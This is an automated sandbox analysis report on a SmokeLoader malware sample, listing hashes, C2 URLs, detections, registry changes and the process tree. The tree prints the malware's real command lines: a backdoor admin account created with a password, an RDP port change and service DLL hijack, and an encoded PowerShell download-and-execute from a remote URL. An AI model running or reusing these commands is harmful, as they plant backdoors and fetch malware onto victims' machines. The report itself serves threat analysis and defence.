Analysis
max time kernel: 162s
max time network: 152s
platform: windows10_x64
resource: win10-en-20211014
submitted: 28-10-2021 16:38
Static task: static1
Behavioral task: behavioral1
  Sample: e5bda93ec7d8724ce496359c5e3efabe.exe
  Resource: win7-en-20211014
Behavioral task: behavioral2
  Sample: e5bda93ec7d8724ce496359c5e3efabe.exe
  Resource: win10-en-20211014
General
Target: e5bda93ec7d8724ce496359c5e3efabe.exe
Size: 185KB
MD5: e5bda93ec7d8724ce496359c5e3efabe
SHA1: ad9e1db817d0c69760155939c2fd633031f10418
SHA256: 0610000cdfda33355202ed75a2f542cf035207e5d26d5e4b11063a17cdcdc8be
SHA512: 53a1e16ab40c0173248b9adf8bb4ecf04fef532301581c63b3876803c8234185fedf4dd588d768e29b610dd5ecc62f933dd79427f086c89741768e5c8cfe9948
Malware Config
Extracted
  https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
  Family: smokeloader
  Version: 2020
  C2:
    http://brandyjaggers.com/upload/
    http://andbal.com/upload/
    http://alotofquotes.com/upload/
    http://szpnc.cn/upload/
    http://uggeboots.com/upload/
    http://100klv.com/upload/
    http://rapmusic.at/upload/
Signatures
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- suricata: ET MALWARE ServHelper CnC Inital Checkin
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes:
  flow | pid | process
  56 | 692 | powershell.exe
  59 | 692 | powershell.exe
  60 | 692 | powershell.exe
  61 | 692 | powershell.exe
  63 | 692 | powershell.exe
  65 | 692 | powershell.exe
  67 | 692 | powershell.exe
  69 | 692 | powershell.exe
  72 | 692 | powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (1 IoCs)
  Processes:
  pid | process
  4580 | 8FD8.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
- Processes:
  resource | yara_rule
  \Windows\Branding\mediasrv.png | upx
  \Windows\Branding\mediasvc.png | upx
- Deletes itself (1 IoCs)
  Processes:
  pid | process
  3056 | (not captured)
- Loads dropped DLL (2 IoCs)
  Processes:
  pid | process
  1500 | (not captured)
  1500 | (not captured)
- Drops file in Program Files directory (4 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFCDD.tmp | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
  File created | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
  File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFC6E.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFC8E.tmp | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
  File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_21fl14we.uok.ps1 | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File created | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFC00.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFCEE.tmp | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_fn55zvfi.xq3.psm1 | powershell.exe
  File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes:
  description | ioc | process
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | e5bda93ec7d8724ce496359c5e3efabe.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | e5bda93ec7d8724ce496359c5e3efabe.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | e5bda93ec7d8724ce496359c5e3efabe.exe
- Modifies data under HKEY_USERS (64 IoCs)
  Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | powershell.exe
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
  description | flow | ioc
  HTTP User-Agent header | 63 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 59 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 60 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 61 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes:
  pid | process
  3220 | e5bda93ec7d8724ce496359c5e3efabe.exe
  3220 | e5bda93ec7d8724ce496359c5e3efabe.exe
  3056 | (not captured; 62 identical entries)
- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes:
  pid | process
  3056 | (not captured)
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
  pid | process
  644 | (not captured)
  644 | (not captured)
- Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes:
  pid | process
  3220 | e5bda93ec7d8724ce496359c5e3efabe.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (tokens listed in the order the report records them):
  pid 1240 powershell.exe: SeDebugPrivilege
  pid 1688 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 5064 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 844 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
- Suspicious use of FindShellTrayWindow (4 IoCs)
  Processes:
  pid | process
  3056 | (not captured)
  3056 | (not captured)
  3056 | (not captured)
  3056 | (not captured)
- Suspicious use of SendNotifyMessage (5 IoCs)
  Processes:
  pid | process
  3056 | (not captured)
  3056 | (not captured)
  3056 | (not captured)
  3056 | (not captured)
  3056 | (not captured)
- Suspicious use of WriteProcessMemory (64 IoCs; every row below is logged twice in the report)
  Processes:
  description | pid | process | target process
  PID 3056 wrote to memory of 4580 | 3056 | (not captured) | 8FD8.exe
  PID 4580 wrote to memory of 1240 | 4580 | 8FD8.exe | powershell.exe
  PID 1240 wrote to memory of 2368 | 1240 | powershell.exe | csc.exe
  PID 2368 wrote to memory of 2500 | 2368 | csc.exe | cvtres.exe
  PID 1240 wrote to memory of 1688 | 1240 | powershell.exe | powershell.exe
  PID 1240 wrote to memory of 5064 | 1240 | powershell.exe | powershell.exe
  PID 1240 wrote to memory of 844 | 1240 | powershell.exe | powershell.exe
  PID 1240 wrote to memory of 3012 | 1240 | powershell.exe | reg.exe
  PID 1240 wrote to memory of 2420 | 1240 | powershell.exe | reg.exe
  PID 1240 wrote to memory of 3212 | 1240 | powershell.exe | reg.exe
  PID 1240 wrote to memory of 4524 | 1240 | powershell.exe | net.exe
  PID 4524 wrote to memory of 3232 | 4524 | net.exe | net1.exe
  PID 1240 wrote to memory of 4624 | 1240 | powershell.exe | cmd.exe
  PID 4624 wrote to memory of 3944 | 4624 | cmd.exe | cmd.exe
  PID 3944 wrote to memory of 4676 | 3944 | cmd.exe | net.exe
  PID 4676 wrote to memory of 4656 | 4676 | net.exe | net1.exe
  PID 1240 wrote to memory of 4568 | 1240 | powershell.exe | cmd.exe
  PID 4568 wrote to memory of 4564 | 4568 | cmd.exe | cmd.exe
  PID 4564 wrote to memory of 1128 | 4564 | cmd.exe | net.exe
  PID 1128 wrote to memory of 1276 | 1128 | net.exe | net1.exe
  PID 2220 wrote to memory of 2000 | 2220 | cmd.exe | net.exe
  PID 2000 wrote to memory of 2768 | 2000 | net.exe | net1.exe
  PID 2440 wrote to memory of 4512 | 2440 | cmd.exe | net.exe
  PID 4512 wrote to memory of 2780 | 4512 | net.exe | net1.exe
  PID 3672 wrote to memory of 1800 | 3672 | cmd.exe | net.exe
  PID 1800 wrote to memory of 4256 | 1800 | net.exe | net1.exe
  PID 5004 wrote to memory of 1148 | 5004 | cmd.exe | net.exe
  PID 1148 wrote to memory of 2012 | 1148 | net.exe | net1.exe
  PID 2976 wrote to memory of 5052 | 2976 | cmd.exe | net.exe
  PID 5052 wrote to memory of 4932 | 5052 | net.exe | net1.exe
  PID 4236 wrote to memory of 5020 | 4236 | cmd.exe | net.exe
  PID 5020 wrote to memory of 5032 | 5020 | net.exe | net1.exe
Processes (bracketed number = nesting depth in the process tree)
- [1] C:\Users\Admin\AppData\Local\Temp\e5bda93ec7d8724ce496359c5e3efabe.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\e5bda93ec7d8724ce496359c5e3efabe.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
- [1] C:\Users\Admin\AppData\Local\Temp\8FD8.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\8FD8.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
- [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ok2j0wes\ok2j0wes.cmdline"
  - Suspicious use of WriteProcessMemory
- [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
  cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA84.tmp" "c:\Users\Admin\AppData\Local\Temp\ok2j0wes\CSC1F554B787EB747A1B8AA18148AA57AB.TMP"
- [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  - Suspicious use of AdjustPrivilegeToken
- [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  - Suspicious use of AdjustPrivilegeToken
- [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  - Suspicious use of AdjustPrivilegeToken
- [3] C:\Windows\system32\reg.exe
  cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
- [3] C:\Windows\system32\reg.exe
  cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
  - Modifies registry key
- [3] C:\Windows\system32\reg.exe
  cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
- [3] C:\Windows\system32\net.exe
  cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  - Suspicious use of WriteProcessMemory
- [4] C:\Windows\system32\net1.exe
  cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- [3] C:\Windows\system32\cmd.exe
  cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
  - Suspicious use of WriteProcessMemory
- [4] C:\Windows\system32\cmd.exe
  cmdline: cmd /c net start rdpdr
  - Suspicious use of WriteProcessMemory
- [5] C:\Windows\system32\net.exe
  cmdline: net start rdpdr
  - Suspicious use of WriteProcessMemory
- [6] C:\Windows\system32\net1.exe
  cmdline: C:\Windows\system32\net1 start rdpdr
- [3] C:\Windows\system32\cmd.exe
  cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
  - Suspicious use of WriteProcessMemory
- [4] C:\Windows\system32\cmd.exe
  cmdline: cmd /c net start TermService
  - Suspicious use of WriteProcessMemory
- [5] C:\Windows\system32\net.exe
  cmdline: net start TermService
  - Suspicious use of WriteProcessMemory
- [6] C:\Windows\system32\net1.exe
  cmdline: C:\Windows\system32\net1 start TermService
- [3] C:\Windows\system32\cmd.exe
  cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
- [3] C:\Windows\system32\cmd.exe
  cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- [1] C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe user WgaUtilAcc 000000 /del
  - Suspicious use of WriteProcessMemory
- [2] C:\Windows\system32\net.exe
  cmdline: net.exe user WgaUtilAcc 000000 /del
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\system32\net1.exe
  cmdline: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- [1] C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe user WgaUtilAcc lbwp0NfX /add
  - Suspicious use of WriteProcessMemory
- [2] C:\Windows\system32\net.exe
  cmdline: net.exe user WgaUtilAcc lbwp0NfX /add
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\system32\net1.exe
  cmdline: C:\Windows\system32\net1 user WgaUtilAcc lbwp0NfX /add
- [1] C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
- [2] C:\Windows\system32\net.exe
  cmdline: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\system32\net1.exe
  cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- [1] C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
  - Suspicious use of WriteProcessMemory
- [2] C:\Windows\system32\net.exe
  cmdline: net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\system32\net1.exe
  cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
- [1] C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
- [2] C:\Windows\system32\net.exe
  cmdline: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\system32\net1.exe
  cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- [1] C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe user WgaUtilAcc lbwp0NfX
  - Suspicious use of WriteProcessMemory
- [2] C:\Windows\system32\net.exe
  cmdline: net.exe user WgaUtilAcc lbwp0NfX
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\system32\net1.exe
  cmdline: C:\Windows\system32\net1 user WgaUtilAcc lbwp0NfX
- [1] C:\Windows\System32\cmd.exe
  cmdline: cmd.exe /C wmic path win32_VideoController get name
- [2] C:\Windows\System32\Wbem\WMIC.exe
  cmdline: wmic path win32_VideoController get name
- [1] C:\Windows\System32\cmd.exe
  cmdline: cmd.exe /C wmic CPU get NAME
- [2] C:\Windows\System32\Wbem\WMIC.exe
  cmdline: wmic CPU get NAME
- [1] C:\Windows\System32\cmd.exe
  cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
- [2] C:\Windows\system32\cmd.exe
